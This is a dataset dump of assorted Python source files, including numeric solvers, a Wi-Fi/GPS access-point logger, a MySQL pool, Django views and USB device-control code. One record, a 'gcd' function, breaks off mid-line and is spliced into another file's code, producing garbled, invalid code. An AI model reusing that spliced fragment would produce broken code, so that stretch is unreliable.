+{"seq_id":"295743717","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[53]:\n\n\nx = [5,6,7,8,9]\nx.sort(reverse=True)\nprint(x)\n\ny = ['a','b','e','d']\ny.sort()\nprint(y)\n\n\n# In[8]:\n\n\ny = ['a','b','e','d']\ny.sort()\nprint(y)\n\n\n# In[10]:\n\n\nz = [1,9,6,'a','m']\n#z.sort()\n\n#String and integer cannot be compred\n#cannot sort different datatypes\n\n\n# In[15]:\n\n\nx2 = [5,6,7,8,9]\nsorted_x2 = sorted(x2, reverse=True) # reverse and store in variable.\nprint(sorted_x2)\nprint(x2)\n\n\n# In[16]:\n\n\nmax(x2)\n\n\n# In[19]:\n\n\nmin(x2)\nsum(x2)\n\n\n# In[21]:\n\n\nmin(y)\n\n\n# In[23]:\n\n\n#check whether an element is in the list or not\nprint(x2)\nprint(7 in x2)\n\n\n# In[32]:\n\n\nfor n in x2:\n print(n, end = '\\t')\n\n\n# In[40]:\n\n\nfor index, n in enumerate(x2):\n print(index,n)\n\n\n# In[37]:\n\n\nfor ind,n in enumerate(y):\n print(ind,n)\n\n\n# In[41]:\n\n\nfor index, n in enumerate(x2, start=100):\n print(index,n)\n\n\n# In[47]:\n\n\ncomp = ['OOP','CSA','NM','CS','MGMT','OS']\n\nj_comp = \"+\".join(comp)\nprint(j_comp)\n\n\n# In[48]:\n\n\nj_comp.split('+')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"list/list,tuple3.py","file_name":"list,tuple3.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"85265418","text":"import numpy as np\nimport 
numpy.linalg as la\n\n\ndef transform(A, b):\n \"\"\"\n Transform the system: Ax = b -> x = Cx+d\n \"\"\"\n C = A.copy()\n d = b.copy()\n for i in range(len(C)):\n d[i] /= C[i, i]\n C[i, :] /= -C[i, i]\n C[i, i] = 0\n return C, d\n\n\ndef richardson(A, b, tol, max_iter=100):\n \"\"\"\n Richardson's method, tau_k = ||A||\n returns: list of x, list of y\n \"\"\"\n tau = la.norm(A)\n\n xs = []\n ys = []\n x = b / tau\n\n while len(xs) < max_iter:\n xs.append(x)\n err = la.norm(A @ x - b)\n ys.append(err)\n\n if err <= tol:\n break\n\n x = x - (A @ x - b)/tau\n\n return xs, ys\n\n\ndef jacobi(A, b, tol, max_iter=100):\n \"\"\"\n Jacobi method\n returns: list of x, list of y\n \"\"\"\n raise NotImplementedError\n return xs, ys\n\n\ndef seidel(A, b, tol, max_iter=100):\n \"\"\"\n Gauss-Seidel method\n returns: list of x, list of y\n \"\"\"\n raise NotImplementedError\n return xs, ys\n","sub_path":"Numerical Methods/S1T2_solve_linear_system/py/iteratives.py","file_name":"iteratives.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"459284062","text":"from sql_tools import wifiTest\nfrom wifi_sniffer import scanWifi, interface_checker\nfrom gps_pos import getGPSPos\nfrom geopy.geocoders import Nominatim\nimport os\n\n\ndef test(debug, count, iface):\n ap_list, mac_list, sig_list, ch_list, encr_list, dist_list = scanWifi(False)\n lat, lon, time, alt, speed, track = getGPSPos(False)\n\n if (count is None):\n count = 0\n for x in range(0, len(ap_list)):\n #loc = getGeoShit(lat, lon)\n wifiTest(count, ap_list[x], mac_list[x], sig_list[x], ch_list[x], encr_list[x], dist_list[x], lat, lon)\n count += 1\n if debug:\n print('Done...')\n return count\n\ndef getGeoShit(lat, lon):\n lang = \"en_US\" # Change this to the language you wish to use\n geolocator = Nominatim(user_agent='wifi-mapper')\n location = geolocator.reverse(str(lat) + ', ' + str(lon), language=lang)\n address = location.raw['address']\n\n if 'city_district' in address:\n city = address.get('city_district', 'N/A')\n else:\n city = address.get('city', 'N/A')\n\n state = address.get('state', 'N/A')\n country = address.get('country', 'N/A')\n\n result_s = city + ', ' + state + ', ' + country\n\n return result_s\n\ncount = 0\niface = '' # Change this to statically set the interface to use\nwhile True:\n try:\n if (iface == ''):\n iface = interface_checker()\n count = test(True, count, iface)\n except KeyboardInterrupt:\n exit()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"407549125","text":"\"\"\"\nThis file implements a metric between stochastic layers\nbased on the Energy distance\n\n https://en.wikipedia.org/wiki/Energy_distance\n\"\"\"\n\nimport itertools\nimport numpy as np\nimport torch\nfrom torch.optim import LBFGS\nfrom torch.functional import F\nfrom torch import nn\nimport geotorch\n\n\nclass StochasticMetric:\n\n def __init__(\n self, center_columns=True, convergence_tol=1e-6,\n max_iter=100, verbose=False, rtol=0.1, atol=1e-3\n ):\n self.center_columns = center_columns\n self.convergence_tol = convergence_tol\n self.rtol = rtol\n self.atol = atol\n self.max_iter = max_iter\n self.verbose = verbose\n\n def fit(self, X, Y):\n \"\"\"\n Align stochastic representations X and Y.\n\n Parameters\n ----------\n X : ndarray\n (num_repeats x num_inputs x num_neurons)\n Y : ndarray\n (num_repeats x 
num_inputs x num_neurons)\n \"\"\"\n\n # Fit alignment parameters.\n Xm, Ym = _flatten_all_pairs(X, Y)\n self.Q_, self.bias_ = _find_rotation_lbfgs(\n Xm, Ym, center_columns=self.center_columns,\n tol=self.convergence_tol, max_iter=self.max_iter, verbose=self.verbose\n )\n\n # Fit self-distance terms for debiasing\n self.Xself_ = _self_dist(X)\n self.Yself_ = _self_dist(Y)\n\n return self\n\n def score(self, X, Y):\n d2 = 2 * self.biased_score(X, Y) - self.Xself_ - self.Yself_\n if (d2 < 0):\n a_badness = np.sqrt(-d2)\n r_badness = -d2 / (self.Xself_ + self.Yself_)\n if (a_badness > self.atol) and (r_badness > self.rtol):\n raise RuntimeError(\n f\"Computed a negative distance. \"\n f\"(absolute error > absolute tol: {a_badness} > {self.atol}).\"\n f\"(relative error > relative tol: {r_badness} > {self.rtol}).\"\n )\n return np.sqrt(max(0, d2))\n\n def biased_score(self, X, Y):\n \"\"\"\n Compute the inflated distance score.\n \"\"\"\n Xm, Ym = _flatten_all_pairs(X, Y)\n resid = Xm - (Ym @ self.Q_) - self.bias_[None, :]\n return np.mean(np.linalg.norm(resid, axis=1))\n\n\ndef _flatten_all_pairs(X, Y):\n \"\"\"\n Flatten activation tensors into matrices, concatenating all pairwise differences\n across repeats of the same input.\n \"\"\"\n n_rep, m, n = X.shape\n Xm, Ym = [], []\n # itr = itertools.product(range(n_rep), range(n_rep))\n itr = itertools.combinations(range(n_rep), 2)\n for (i1, i2), j in itertools.product(itr, range(m)):\n Xm.append(X[i1, j])\n Ym.append(Y[i2, j])\n\n # Convert into numpy arrays.\n return np.array(Xm), np.array(Ym)\n\n\ndef _self_dist(X):\n \"\"\"\n Flatten X and into a matrix, concatenating combinations without\n replacement for the repeats.\n \"\"\"\n n_rep, m, n = X.shape\n itr = itertools.combinations(range(n_rep), 2)\n d = 0.0\n c = 0\n for (i1, i2), j in itertools.product(itr, range(m)):\n d += np.linalg.norm(X[i1, j] - X[i2, j])\n c += 1\n return d / c\n # return d / (m * n_rep * (n_rep - 1) // 2)\n\n\ndef _find_rotation_lbfgs(\n X, Y, tol=1e-6, max_iter=100, verbose=True, center_columns=True,\n ):\n \"\"\"\n Finds orthogonal matrix Q, scaling s, and translation b, to\n\n minimize sum(norm(X - s * Y @ Q - b)).\n\n Note that the solution is not in closed form because we are\n minimizing the sum of norms, which is non-trivial given the\n orthogonality constraint on Q. Without the orthogonality\n constraint, the problem can be formulated as a cone program:\n\n Guoliang Xue & Yinyu Ye (2000). \"An Efficient Algorithm for\n Minimizing a Sum of p-Norms.\" SIAM J. Optim., 10(2), 551–579.\n\n However, the orthogonality constraint complicates things, so\n we just minimize by gradient methods used in manifold optimization.\n\n Mario Lezcano-Casado (2019). 
\"Trivializations for gradient-based\n optimization on manifolds.\" NeurIPS.\n \"\"\"\n\n # Convert X and Y to pytorch tensors.\n X = torch.tensor(X)\n Y = torch.tensor(Y)\n\n # Check inputs.\n m, n = X.shape\n assert Y.shape == X.shape\n\n # Orthogonal linear transformation.\n Q = nn.Linear(n, n, bias=False)\n geotorch.orthogonal(Q, \"weight\")\n Q = Q.double()\n\n # Allow a rigid translation.\n bias = nn.Parameter(torch.zeros(n, dtype=torch.float64))\n\n # Collect trainable parameters\n trainable_params = list(Q.parameters())\n\n if center_columns:\n trainable_params.append(bias)\n\n # Define rotational alignment, and optimizer.\n optimizer = LBFGS(\n trainable_params,\n max_iter=100, # number of inner iterations.\n line_search_fn=\"strong_wolfe\",\n )\n\n def closure():\n optimizer.zero_grad()\n loss = torch.mean(\n torch.norm(X - Q(Y) - bias, dim=1)\n )\n loss.backward()\n return loss\n\n # Fit parameters.\n converged = False\n itercount = 0\n while (not converged) and (itercount < max_iter):\n\n # Update parameters.\n new_loss = optimizer.step(closure).item()\n\n # Check convergence.\n if itercount != 0:\n improvement = (last_loss - new_loss) / last_loss\n converged = improvement < tol\n \n last_loss = new_loss\n\n # Display progress.\n itercount += 1\n if verbose:\n print(f\"Iter {itercount}: {last_loss}\")\n if converged:\n print(\"Converged!\")\n\n # Extract result in numpy.\n Q_ = Q.weight.detach().numpy()\n bias_ = bias.detach().numpy()\n\n return Q_, bias_\n","sub_path":"netrep/metrics/stochastic.py","file_name":"stochastic.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401218551","text":"import torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport argparse\nimport pprint\nimport gc\n\nif __name__ == '__main__':\n from benchmark_common import benchmark_init\n from common import Bench, tag\n from models import bnlstm\nelse:\n from .benchmark_common import benchmark_init\n from .common import Bench, tag\n from .models import bnlstm\n\n\n# From https://github.com/jihunchoi/recurrent-batch-normalization-pytorch\n\ndef run_bnlstm(hidden_size=100, max_length=784, pmnist=False, num_batches=5,\n cuda=False, jit=False, warmup=10, benchmark=20):\n name = 'bnlstm{}{}'.format(tag(cuda=cuda), tag(jit=jit))\n iter_timer = Bench(name, cuda=cuda, warmup_iters=2)\n\n # The CPU version is slow...\n batch_size = 20 if cuda else 5\n\n class Model(nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.rnn = bnlstm.LSTM(cell_class=bnlstm.BNLSTMCell, input_size=1,\n hidden_size=hidden_size, batch_first=True,\n max_length=max_length, jit=jit)\n self.fc = nn.Linear(in_features=hidden_size, out_features=10) # 10 digits in mnist\n\n def forward(self, data):\n hx = None\n if not pmnist:\n h0 = Variable(data.data.new(data.size(0), hidden_size)\n .normal_(0, 0.1))\n c0 = Variable(data.data.new(data.size(0), hidden_size)\n .normal_(0, 0.1))\n hx = (h0, c0)\n _, (h_n, _) = self.rnn(input_=data, hx=hx)\n logits = self.fc(h_n[0])\n return logits\n\n def cast(tensor):\n return tensor.cuda() if cuda else tensor\n\n model = Model()\n criterion = nn.CrossEntropyLoss()\n data_batches = [Variable(cast(torch.zeros(batch_size, 28 * 28, 1))) for _ in range(num_batches)]\n target_batches = [Variable(cast(torch.zeros(batch_size)).long()) for _ in range(num_batches)]\n if cuda:\n model.cuda()\n criterion.cuda()\n\n total_loss = 0\n for data, targets in zip(data_batches, 
target_batches):\n gc.collect()\n with iter_timer:\n logits = model(data)\n loss = criterion(input=logits, target=targets)\n loss.backward()\n total_loss += float(loss.data.item()) # CUDA sync point\n\n return iter_timer\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"PyTorch BNLSTM benchmark.\")\n parser.add_argument('--num_batches', type=int, default=1, help=\"num batches\")\n parser.add_argument('--hidden-size', type=int, default=100, help=\"Hidden size\")\n parser.add_argument('--max-length', type=int, default=784, help=\"max seq len\")\n parser.add_argument('--warmup', type=int, default=10, help=\"Warmup iterations\")\n parser.add_argument('--benchmark', type=int, default=20, help=\"Benchmark iterations\")\n parser.add_argument('--jit', action='store_true', help=\"Use JIT\")\n parser.add_argument('--cuda', action='store_true', help=\"Use cuda\")\n args = parser.parse_args()\n\n pprint.pprint(vars(args))\n run_bnlstm(**vars(args))\n","sub_path":"legacy/rnns/benchmarks/bnlstm.py","file_name":"bnlstm.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"651655706","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport json\nimport subprocess\nimport datetime\nimport numpy\nfrom argparse import ArgumentParser\n\nsys.path.append(\"lib\")\nimport utils\nimport slack\nimport strategy\nfrom loader import Loader\n\n\nparser = ArgumentParser()\nparser = strategy.add_options(parser)\nargs = parser.parse_args()\n\ntry:\n performace_dir=\"simulate_settings/performances/\"\n f = open(\"%s%sperformance.json\" % (performace_dir, strategy.get_prefix(args)), \"r\")\n data = json.load(f)\nexcept:\n data = None\n\nif data is None:\n print(\"%s is invalid json\" % args.filename)\n exit()\n\nsetting_dict, _ = strategy.load_strategy_setting(args)\n\noptimize_end_date = setting_dict[\"date\"]\nfiltered = list(filter(lambda x: utils.to_datetime(x[0]) < utils.to_datetime(optimize_end_date), data.items()))\n\nsum_gain = sum(list(map(lambda x: x[1][\"gain\"],filtered))) # 総利益\nsum_trade = sum(list(map(lambda x: x[1][\"trade\"],filtered))) # 総トレード数\nave_trade = numpy.average(list(map(lambda x: x[1][\"trade\"],filtered))) # 平均トレード数\n\ngain = 0\ngains = []\nfor d in sorted(data.items(), key=lambda x:utils.to_datetime(x[0])):\n gain = gain + d[1][\"gain\"]\n gains = gains + [gain]\n\nmin_gain = min(gains)\ngain_per_trade = (sum_gain - (min_gain if min_gain < 0 else -min_gain)) / sum_trade # 1トレード当たりの利益\n\ndiff = []\nfor i, gain in enumerate(gains):\n average = (i+1) * ave_trade * gain_per_trade + min_gain\n diff = diff + [abs(abs(gain) - abs(average))]\n\nscore = 1 / sum(diff) \n\nprint(sum(diff))\nprint(score)\n","sub_path":"performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"96359028","text":"from lxml import etree,objectify\nfrom zipfile import ZipFile\nimport os\nimport argparse\nfrom os.path import basename\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', help='Path for the report',required=True)\n\nargs = parser.parse_args()\nnamespaces = {}\nfolder = [\n \"datasources\",\"META-INF\",\"resources\"\n]\n\ndef get_files_in_path(dir):\n file_paths = []\n for root, directories, files in os.walk(dir): \n for filename in files: \n filepath = os.path.join(root, filename) \n file_paths.append(filepath) \n return 
file_paths \n\ndef cleanup(path):\n pass\n\ndef compress(path):\n file_paths = get_files_in_path(path)\n with ZipFile(args.path+'first_level.prpt','w') as zip:\n for file in file_paths:\n temp = file.split(os.sep)[-2]\n if temp in folder:\n zip.write(file,temp+\"/\"+basename(file))\n else:\n zip.write(file,basename(file))\n\ndef extract(path,level):\n with ZipFile(path,mode='r') as zipObj:\n zipObj.extractall(path=args.path+level)\n\ndef write(root,path):\n etree.ElementTree(root).write(path+'layout.xml',pretty_print=True)\n\ndef re_namespaces(root):\n for k,v in root.nsmap.items():\n if k == 'style':\n namespaces['style'] = v\n if k == 'core':\n namespaces['core'] = v\n if not k:\n namespaces['prefix'] = v\n\ndef create_style_expression_tag(min_width):\n ns = etree.Element('style-expression')\n ns.attrib['style-key'] = \"min-width\"\n ns.attrib['formula'] = '=IF(ISEXPORTTYPE(\"table/html\");'+str(min_width)+';NA())'\n return ns\n\ndef style_element_style(style):\n min_width = 0\n ss = style.find('style:spatial-styles',namespaces)\n if ss is not None:\n min_width = ss.attrib['min-width'] if 'min-width' in ss.attrib else 0\n return create_style_expression_tag(min_width)\n\ndef remove_width_label(band):\n pass\n\ndef insert_new_node(new,sibling):\n\n if new is not None:\n sibling.addnext(new)\n\ndef remove_width_band(band):\n for b in band:\n new = None\n if \"band\" in b.tag:\n if len(b.findall(\".//style-expression[@style-key='min-width']\",namespaces)) <= 0:\n new = remove_width_band(b)\n insert_new_node(new,b)\n\n elif \"label\" in b.tag:\n if len(b.findall(\".//style-expression[@style-key='min-width']\",namespaces)) <= 0:\n es = b.find('style:element-style',namespaces)\n new = style_element_style(es)\n insert_new_node(new,es)\n\n elif \"style\" in b.tag:\n if len(b.findall(\".//style-expression[@style-key='min-width']\",namespaces)) <= 0:\n new = style_element_style(b)\n insert_new_node(new,b)\n \n return band\n\n\ndef remove_width_from_excel_field(field):\n min_width = 0\n for f in field.find('style:element-style',namespaces).findall('style:spatial-styles',namespaces):\n if f is not None:\n min_width = (f.attrib['min-width'])\n if len(field.findall(\".//style-expression[@style-key='min-width']\",namespaces)) <= 0:\n ns = etree.Element('style-expression')\n ns.attrib['style-key'] = \"min-width\"\n ns.attrib['formula'] = '=IF(ISEXPORTTYPE(\"table/html\");'+str(min_width)+';NA())'\n field.insert(-1,ns)\n return field\n \n\ndef remove_link_from_excel(href):\n link = href.attrib['formula']\n if href.attrib.get('style-key') is not None and href.attrib.get('style-key') == 'href-target':\n if link.find('ISEXPORTTYPE') > -1:\n return link\n else:\n return '=IF(ISEXPORTTYPE(\"table/html\");'+link[1:]+';NA())'\n else:\n return link\n\ndef parse_xml(xmlFile):\n tree = etree.parse(xmlFile+\"layout.xml\")\n root = tree.getroot()\n re_namespaces(root)\n details = root.find(\".//prefix:group\",namespaces)\n hrefs = details.findall(\".//prefix:style-expression[@style-key='href-target']\",namespaces)\n attrb = details.findall(\".//prefix:*[@core:field]\",namespaces)\n header = details.find(\".//prefix:group-header\",namespaces).find('.//prefix:root-level-content',namespaces)\n for href in hrefs:\n href.attrib['formula'] = remove_link_from_excel(href)\n for attr in attrb:\n attr = remove_width_from_excel_field(attr)\n for h in header:\n header = remove_width_band(h)\n write(root,xmlFile)\n \n\ndef main():\n if args.path[-1] != '/':\n args.path = args.path+\"/\"\n level = \"first_level\"\n 
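A side note on the formula rewriting applied by remove_link_from_excel above: hyperlink formulas are made HTML-only by guarding them with ISEXPORTTYPE. The helper below is a standalone sketch of that same rule, not part of the original script; the sample formula and function name are made up for illustration:

def wrap_formula_html_only(formula):
    # Formulas that are already guarded pass through untouched.
    if 'ISEXPORTTYPE' in formula:
        return formula
    # Re-embed the formula body (minus its leading '=') so it only
    # evaluates for HTML output and yields NA() for other export types.
    return '=IF(ISEXPORTTYPE("table/html");' + formula[1:] + ';NA())'

assert wrap_formula_html_only('=[LINK]') == '=IF(ISEXPORTTYPE("table/html");[LINK];NA())'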
extract(args.path+level+\".prpt\",level)\n    parse_xml(args.path+level+\"/\")\n    compress(args.path+level+\"/\")\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"scripts/html_only.py","file_name":"html_only.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"479271042","text":"from django.shortcuts import render,redirect\n\nfrom django.http import HttpResponse\n\n# Create your views here.\n\nfrom conso.models import Releve\nfrom conso.forms import ReleveModelForm\n\ndef home(request):\n if request.method == 'GET':\n form = ReleveModelForm()\n releves = Releve.objects.all().order_by('-date_effectue')[:5]\n return render(request, 'conso/home.html',\n context = {\n 'releves': releves,\n 'form': form,\n }\n )\n elif request.method==\"POST\":\n valeur_compteur = request.POST.get(\"valeur_compteur\",\"\")\n date_effectue = request.POST.get(\"date_effectue\",\"\")\n type_compteur = request.POST.get(\"type_compteur\",\"\")\n releve = Releve(valeur=valeur_compteur , date_effectue=date_effectue , type_compteur=type_compteur)\n releve.save()\n return redirect(\"conso/realisee\")\n\n\n# return render(request,\n# \"conso/home.html\",\n# context = { 'releves': releves}\n# )\n\ndef conso_realisee(request):\n releves = Releve.objects.all()\n return render(request,\n \"conso/conso_realisee.html\",\n context = { 'releves': releves}\n )\n","sub_path":"conso/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"270680874","text":"\"\"\"\n MySQL database connection pool\n To use it, just import the mysql instance at the bottom of this file\n Examples:\n from monday.public.db_util import mysql\n sql = 'select id, username from db_UserInfo where username=%(username)s'\n res = mysql.fetch_all(sql, {'username': 'abc'})\n -- query all rows in db_UserInfo where username is 'abc', returned as dicts\n\n from monday.public.db_util import mysql\n sql = 'select id, username from db_UserInfo where username=%(username)s'\n res = mysql.fetch_one(sql, {'username': 'abc'}, res_dict=None)\n -- query db_UserInfo where username is 'abc', returning only one row as a tuple\n\n insert, update and delete are executed inside transactions\n\"\"\"\n\nimport pymysql\nfrom dbutils.pooled_db import PooledDB\nfrom ..configs.setting import MYSQL_CONFIG\nfrom flask import current_app\n\nclass MySql:\n def __init__(self):\n self._poolDB = PooledDB(\n # database connection driver\n creator=pymysql,\n # maximum number of connections the pool allows; 0 or None means no limit\n maxconnections=3,\n # idle connections created when the pool is initialized; 0 means none\n mincached=2,\n # maximum number of idle connections kept in the pool; 0 or None means no limit\n maxcached=5,\n # maximum number of shared connections; 0 or None means share all (little practical effect)\n maxshared=3,\n # whether to block and wait when no shared connection is available; True means wait,\n # False means raise an error instead of waiting\n blocking=True,\n # list of commands executed before each session starts\n setsession=[],\n # ping the MySQL server to check availability: 0 = never, 1 = default = whenever fetched from the pool, 2 = when a cursor is created, 4 = when a query is executed, 7 = always\n ping=0,\n **MYSQL_CONFIG\n )\n\n def _get_one_connect(self, res_dict):\n self._conn = self._poolDB.connection()\n self._cursor = self._conn.cursor(cursor=res_dict)\n\n def _close(self):\n self._cursor.close()\n self._conn.close()\n\n def fetch_one(self, sql, args=None, res_dict=pymysql.cursors.DictCursor):\n \"\"\"\n Return the first result row\n :param sql: query statement\n :param args: query parameters\n :param res_dict: result type - dict by default - pass None to get tuples\n :return:\n \"\"\"\n self._get_one_connect(res_dict)\n self._cursor.execute(sql, args)\n # fetch a single result row\n result = self._cursor.fetchone()\n self._close()\n return result\n\n def fetch_all(self, sql, args=None, res_dict=pymysql.cursors.DictCursor):\n \"\"\"\n Return all result rows\n :param sql: query statement\n :param args: query parameters\n 
:param res_dict: result type - dict by default - pass None to get tuples\n :return:\n \"\"\"\n self._get_one_connect(res_dict)\n self._cursor.execute(sql, args)\n # fetch all result rows\n result = self._cursor.fetchall()\n self._close()\n return result\n\n def _transaction(self, sql, args):\n \"\"\"Transaction handling\"\"\"\n self._get_one_connect(None)\n self._conn.begin() # begin the transaction\n try:\n self._cursor.execute(sql, args)\n self._conn.commit() # commit the transaction\n except Exception as e:\n self._conn.rollback() # roll the transaction back\n current_app.logger.error(f\"\"\"database execution failed: [sql: {sql}] {e}\"\"\")\n raise e\n\n def insert(self, sql, args=None):\n self._transaction(sql, args)\n\n def update(self, sql, args=None):\n self._transaction(sql, args)\n\n def delete(self, sql, args=None):\n self._transaction(sql, args)\n\n\n# module-level instance; import this instance wherever the pool is needed\nmysql = MySql()\n","sub_path":"monday/monday/public/db_util.py","file_name":"db_util.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"273787264","text":"def gcd(m,n):\r\n    if(m 0:\n            handle.controlWrite(usb1.REQUEST_TYPE_VENDOR, REQ_RAM,\n                address, 0, data[:4096])\n            data = data[4096:]\n            address += 4096\n            handle.controlWrite(usb1.REQUEST_TYPE_VENDOR, REQ_RAM, REG_CPUCS, 0, [0])\n            handle.close()\n\n            # And rediscover the device after it reenumerates.\n            discover = True\n        else:\n            handle = device.open()\n            device_serial = handle.getASCIIStringDescriptor(\n                device.getSerialNumberDescriptor())\n            if device_serial in handles:\n                continue\n\n            logger.debug(\"found rev%s device with serial %s\", revision, device_serial)\n            handles[device_serial] = (revision, handle)\n\n        if discover:\n            # Give every device we loaded firmware onto a bit of time to reenumerate.\n            time.sleep(1.0)\n\n        if len(handles) == 0:\n            raise GlasgowDeviceError(\"device not found\")\n        if serial is None:\n            if len(handles) > 1:\n                raise GlasgowDeviceError(\"found {} devices (serial numbers {}), but a serial \"\n                                         \"number is not specified\"\n                                         .format(len(handles), \", \".join(handles.keys())))\n        else:\n            if serial not in handles:\n                raise GlasgowDeviceError(\"device with serial number {} not found\"\n                                         .format(serial))\n\n        self.usb_context = usb_context\n        self.usb_poller = _PollerThread(self.usb_context)\n        self.usb_poller.start()\n        if serial is None:\n            self.revision, self.usb_handle = next(iter(handles.values()))\n        else:\n            self.revision, self.usb_handle = handles[serial]\n        try:\n            self.usb_handle.setAutoDetachKernelDriver(True)\n        except usb1.USBErrorNotSupported:\n            pass\n\n    def close(self):\n        self.usb_poller.done = True\n        self.usb_handle.close()\n        self.usb_context.close()\n\n    async def _do_transfer(self, is_read, setup):\n        # libusb transfer cancellation is asynchronous, and moreover, it is necessary to wait for\n        # all transfers to finish cancelling before closing the event loop. 
To do this, use\n # separate futures for result and cancel.\n cancel_future = asyncio.Future()\n result_future = asyncio.Future()\n\n transfer = self.usb_handle.getTransfer()\n setup(transfer)\n\n def usb_callback(transfer):\n if self.usb_poller.done:\n return # shutting down\n if transfer.isSubmitted():\n return # transfer not completed\n\n status = transfer.getStatus()\n if status == usb1.TRANSFER_CANCELLED:\n usb_transfer_type = transfer.getType()\n if usb_transfer_type == usb1.TRANSFER_TYPE_CONTROL:\n transfer_type = \"CONTROL\"\n if usb_transfer_type == usb1.TRANSFER_TYPE_BULK:\n transfer_type = \"BULK\"\n endpoint = transfer.getEndpoint()\n if endpoint & usb1.ENDPOINT_DIR_MASK == usb1.ENDPOINT_IN:\n endpoint_dir = \"IN\"\n if endpoint & usb1.ENDPOINT_DIR_MASK == usb1.ENDPOINT_OUT:\n endpoint_dir = \"OUT\"\n logger.trace(\"USB: %s EP%d %s (cancelled)\",\n transfer_type, endpoint & 0x7f, endpoint_dir)\n cancel_future.set_result(None)\n elif result_future.cancelled():\n pass\n elif status == usb1.TRANSFER_COMPLETED:\n if is_read:\n result_future.set_result(transfer.getBuffer()[:transfer.getActualLength()])\n else:\n result_future.set_result(None)\n elif status == usb1.TRANSFER_STALL:\n result_future.set_exception(usb1.USBErrorPipe())\n elif status == usb1.TRANSFER_NO_DEVICE:\n result_future.set_exception(GlasgowDeviceError(\"device lost\"))\n else:\n result_future.set_exception(GlasgowDeviceError(\n \"transfer error: {}\".format(usb1.libusb1.libusb_transfer_status(status))))\n\n loop = asyncio.get_event_loop()\n transfer.setCallback(lambda transfer: loop.call_soon_threadsafe(usb_callback, transfer))\n transfer.submit()\n try:\n return await result_future\n except asyncio.CancelledError:\n try:\n transfer.cancel()\n await cancel_future\n except usb1.USBErrorNotFound:\n pass # already finished, one way or another\n raise\n\n async def control_read(self, request_type, request, value, index, length):\n logger.trace(\"USB: CONTROL IN type=%#04x request=%#04x \"\n \"value=%#06x index=%#06x length=%d (submit)\",\n request_type, request, value, index, length)\n data = await self._do_transfer(is_read=True, setup=lambda transfer:\n transfer.setControl(request_type|usb1.ENDPOINT_IN, request, value, index, length))\n logger.trace(\"USB: CONTROL IN data=<%s> (completed)\", dump_hex(data))\n return data\n\n async def control_write(self, request_type, request, value, index, data):\n if not isinstance(data, (bytes, bytearray)):\n data = bytes(data)\n logger.trace(\"USB: CONTROL OUT type=%#04x request=%#04x \"\n \"value=%#06x index=%#06x data=<%s> (submit)\",\n request_type, request, value, index, dump_hex(data))\n await self._do_transfer(is_read=False, setup=lambda transfer:\n transfer.setControl(request_type|usb1.ENDPOINT_OUT, request, value, index, data))\n logger.trace(\"USB: CONTROL OUT (completed)\")\n\n async def bulk_read(self, endpoint, length):\n logger.trace(\"USB: BULK EP%d IN length=%d (submit)\", endpoint & 0x7f, length)\n data = await self._do_transfer(is_read=True, setup=lambda transfer:\n transfer.setBulk(endpoint|usb1.ENDPOINT_IN, length))\n logger.trace(\"USB: BULK EP%d IN data=<%s> (completed)\", endpoint & 0x7f, dump_hex(data))\n return data\n\n async def bulk_write(self, endpoint, data):\n if not isinstance(data, (bytes, bytearray)):\n data = bytes(data)\n logger.trace(\"USB: BULK EP%d OUT data=<%s> (submit)\", endpoint & 0x7f, dump_hex(data))\n await self._do_transfer(is_read=False, setup=lambda transfer:\n transfer.setBulk(endpoint|usb1.ENDPOINT_OUT, data))\n logger.trace(\"USB: 
BULK EP%d OUT (completed)\", endpoint & 0x7f)\n\n async def _read_eeprom_raw(self, idx, addr, length, chunk_size=0x1000):\n \"\"\"\n Read ``length`` bytes at ``addr`` from EEPROM at index ``idx``\n in ``chunk_size`` byte chunks.\n \"\"\"\n data = bytearray()\n while length > 0:\n chunk_length = min(length, chunk_size)\n logger.debug(\"reading EEPROM chip %d range %04x-%04x\",\n idx, addr, addr + chunk_length - 1)\n data += await self.control_read(usb1.REQUEST_TYPE_VENDOR, REQ_EEPROM,\n addr, idx, chunk_length)\n addr += chunk_length\n length -= chunk_length\n return data\n\n async def _write_eeprom_raw(self, idx, addr, data, chunk_size=0x1000):\n \"\"\"\n Write ``data`` to ``addr`` in EEPROM at index ``idx``\n in ``chunk_size`` byte chunks.\n \"\"\"\n while len(data) > 0:\n chunk_length = min(len(data), chunk_size)\n logger.debug(\"writing EEPROM chip %d range %04x-%04x\",\n idx, addr, addr + chunk_length - 1)\n await self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_EEPROM,\n addr, idx, data[:chunk_length])\n addr += chunk_length\n data = data[chunk_length:]\n\n @staticmethod\n def _adjust_eeprom_addr_for_kind(kind, addr):\n if kind == \"fx2\":\n base_offset = 